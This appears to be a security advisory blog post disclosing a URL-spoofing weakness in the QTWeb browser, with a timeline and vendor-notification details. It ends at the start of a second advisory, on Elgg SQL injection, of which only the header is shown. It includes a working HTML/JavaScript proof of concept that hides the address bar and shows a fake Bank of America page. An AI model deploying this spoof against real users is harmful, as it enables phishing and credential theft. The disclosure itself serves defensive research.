QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks

Monday, October 03, 2011
#################################################
QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks
Vendor URL: http://www.qtweb.net/
Vendor bugtrack=> http://code.google.com/p/qtweb/issues/detail?id=151
Advisore: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html
Vendor notify: YES exploit available: YES
##################################################

###################
Description By vendor
###################

QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open source project based on Nokia's Qt framework and Apple's WebKit rendering engine (the same as being used in Apple Safari and Google Chrome).

######################
Vulnerability Description
######################

In a normal case when navigate to a site, the browser shows real URL But it has a weakness and a attacker can show a empty URL. This weakness can be used for pishing or spoof attacks because you can think that  you are in bank of america for example and the browser don't show nothing in  URL:)
Whithout Any URL
Also a attacker can compose a popup with atributes and it can be used too for spoof or phishing attacks. toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0
Popup Whithout Toolbars and address bar
################
Versions afected
################

QTweb 3.7.2 Vulnerable
QTweb 3.7.3 (buils 087) Vulnerable
and posible prior versions.

######################
Proof Of Concept
######################
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
  <title>QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon</title>
  <script type="text/javascript">
var wx;
function invokePoC() {
  wx = open(":#:","newwin");
  setInterval("doit()",1);
}
function doit() {
  wx.document.open();
  wx.document.write("<title>Bank of America | Home | Personal</title><img src='data:image/gif;base64,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'/>");
}
  </script>
</head>
<body>
<h1>QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p>First Click in this link ==> <a href=":#:" onClick="invokePoC();" target="_blank">invoke PoC</a></p>
<p>and Look in result window, the address bar , don't show The url
and if you write any url in the address bar, the browser do not navigate to it.
This issue can be used to spoof sites or pishing attacks.
Safari 5.1 (7534.50)
</body>
</html>

################
Solution
###############

No solution at this time !!!

###############
Timeline
###############

Discovered :Mar 30, 2011
Vendor Notify: Sep 28, 2011
Vendor response: XXXXX
Vendor Patch: XXXXXX
Public Disclosure: Oct 03, 2011

########################## €nd ########################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection

Monday, August 15, 2011
##################################################
Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection
Vendor URL: http://www.elgg.org/
Advisore: http://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.html
Vendor notify: YES exploit available: YES
##################################################

###################
Description By vendor
###################

Elgg is an award-winning social networking engine, delivering
the building blocks that enable businesses, schools, universities
and associations to create their own fully-featured social networks
and applications. Organizations with networks powered by Elgg
